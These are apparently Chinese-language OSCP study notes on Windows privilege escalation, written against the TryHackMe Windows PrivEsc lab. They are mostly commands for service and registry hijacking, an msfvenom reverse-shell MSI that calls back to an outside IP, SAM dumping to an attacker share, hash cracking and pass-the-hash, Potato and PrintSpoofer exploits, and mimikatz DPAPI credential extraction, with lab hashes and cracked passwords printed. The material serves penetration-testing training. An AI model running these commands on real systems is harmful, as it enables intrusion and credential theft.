3-传统windows提权手法 - My-oscp-all-things

https://gist.github.com/sckalath/8dacd032b65404ef7411 https://steflan-security.com/windows-privilege-escalation-weak-permission/ ### 不安全的服务权限【覆盖】 ``` C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc ``` 发现以system权限运行，修改其binpath后启动 ![[Pasted image 20220103231130.png]] sc qc daclsvc发现属于localsystem ![[Pasted image 20220103231205.png]] sc config daclsvc binpath= "\"C:\Users\user\Desktop\reverse.exe\"" ![[Pasted image 20220103231402.png]] answer:C:\Program Files\DACL Service\daclservice.exe ![[Pasted image 20220103231438.png]] ### 不带引号的服务路径【覆盖】 ![[Pasted image 20220103231603.png]] 跟上面不同的是没有带引号使用accesschk.exe 查询一下 C:\Program Files\Unquoted Path Service\Common Files的写入权限 ```text C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\" ``` ![[Pasted image 20220103231859.png]] 发现我们是对改目录有写入权限的，我们为user用户将reverse.exe 覆盖掉unquotedpathservice.exe C:\Program Files\Unquoted Path Service\Common Files ```text copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe" ``` ![[Pasted image 20220103232236.png]] net start unquotedsvc ![[Pasted image 20220103232737.png]] 疑惑+解决：在练习过程中我不明白为什么上传common.exe放到C:\Program Files\Unquoted Path Service\下便可运行，因为不带引号的路径在C:\Program Files\Unquoted Path Service\ 于是我搜索，发现调用的方式为下图1-5一次调用。所以只需要放到其中任意一个即可，而上级目录是有写入的所以直接传到上级即可。 ```text 为了运行**SomeExecutable.exe**，系统会按照以下从 1 到 5 的顺序解释这个路径。 1. C:\程序.exe 2. C:\Program Files\A.exe 3. C:\Program Files\A 子文件夹\B.exe 4. C:\Program Files\A 子文件夹\B 子文件夹\C.exe 5. C:\Program Files\A 子文件夹\B 子文件夹\C 子文件夹\SomeExecutable.exe 如果未找到**C:\Program.exe**，则将执行**C:\Program Files\A.exe**。如果未找到**C:\Program Files\A.exe**，则将执行**C:\Program Files\A Subfolder\B.exe**，依此类推。 ``` ### 弱注册表权限 sc qc regsvc ![[Pasted image 20220103233058.png]] 可以看到是localsystem运行 ```text C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc or **Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl** in powershell ``` ![[Pasted image 20220103234000.png]] 注意到基本都可以访问读写RW NT AUTHORITY\INTERACTIVE 那么我们把image path给覆盖掉来反弹system的shel ```text reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f ``` ![[Pasted image 20220103234155.png]] ### 不安全的服务可执行文件 [这里有个疑问，daclsvc的需要查看下是否所有人都可写] sc qc filepermsvc ![[Pasted image 20220103235319.png]] ```text C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe" ``` 发现是所有人都可写的，将它替换掉 ![[Pasted image 20220103235247.png]] ```text copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y net start filepermsvc ``` ![[Pasted image 20220103235420.png]] ### 自动运行 ```text reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ``` ### installer安装服务 ```text reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 都设置为1 ``` 生成msi ```text msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.0.230 LPORT=53 -f msi -o reverse.msi ``` ```text msiexec /quiet /qn /i C:\PrivEsc\reverse.msi ``` ### 从注册表里查密码 ```bash reg query HKLM /f password /t REG_SZ /s reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon" ``` ### cmdkey 查看存储的凭据 ```text cmdkey /list runas /user:admin /savecred cmd or reverse.exe ``` ![[Pasted image 20220105181132.png]] ### SAM C:\Windows\Repair\SAM copy C:\Windows\Repair\SAM \\10.10.10.10\kali\ copy C:\Windows\Repair\SYSTEM ```text git clone https://github.com/Tib3rius/creddump7 pip3 install pycrypto python3 creddump7/pwdump.py SYSTEM SAM ``` ![[Pasted image 20220105182956.png]] ```text Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2::: user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a::: admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da::: ``` ```bash hashcat -m 1000 hash_test /usr/share/wordlists/rockyou.txt --show --username ``` ![[Pasted image 20220105183141.png]] ```text Administrator:fc525c9683e8fe067095ba2ddc971889:Passw0rd! Guest:31d6cfe0d16ae931b73c59d7e0c089c0: DefaultAccount:31d6cfe0d16ae931b73c59d7e0c089c0: user:91ef1073f6ae95f5ea6ace91c09a963a:password321 admin:a9fdfa038c4b75ebc76dc855dd74f0da:password123 ``` ```bash impacket-psexec [email protected] -hashes a9fdfa038c4b75ebc76dc855dd74f0da:a9fdfa038c4b75ebc76dc855dd74f0da ``` ![[Pasted image 20220105184217.png]] python ms14-068.py -u [email protected] -s S-1-5-21-3025105784-3259396213-1915610826-500 -d DC01 ### 查看定时计划 ```text schtasks /query /fo LIST ``` ``` schtasks /query /fo LIST /tn Cleanup schtasks /query /fo LIST /v | findstr "Task To Run:" SharPersist.exe -t schtask -m list ->好东西果然有用 ``` ### 打印机提权printspoof.exe ``` printspoof.exe -i -c cmd.exe | reverse.exe ``` ![[Pasted image 20220105221154.png]] ### 不安全的应用ui ![[Pasted image 20220105222025.png]] - ![[Pasted image 20220105222055.png]] ```text file://c:/windows/system32/cmd.exe ``` - ![[Pasted image 20220105222228.png]] ### rouge potato 如果机器 >= Windows 10 1809 & Windows Server 2019 — 尝试 Rogue Potato 如果机器是 < Windows 10 1809 < Windows Server 2019 — 尝试 Juicy Potato ```text sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.127.236:9999 C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe #弹回local service权限后继续运行因为potato需要local service /network service等权限才可以 C:\PrivEsc\RoguePotato.exe -r 10.9.1.66 -e "C:\PrivEsc\reverse.exe" -l 9999 #弹回system权限 ``` ![[Pasted image 20220105225813.png]] 注意了这个需要 **SeImpersonatePrivilege** 权限 to local|network service 以及 SeAssignPrimaryTokenPrivilege to system privilege ![[Pasted image 20220105231151.png]] ### else all ``` https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dpapi-extracting-passwords sekurlsa::dpapi dpapi::chrome /in:"c:tempCookies" /masterkey:上图的masterkey值 /unprotect ``` #### dpapi-1 ```text dpapi::cred /in:"C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D" /masterkey:ced3b33f-849e-4587-8829-fbaf4cd747a7 ``` #### 练习机器 [TryHackMe | Windows PrivEsc](https://tryhackme.com/room/windows10privesc)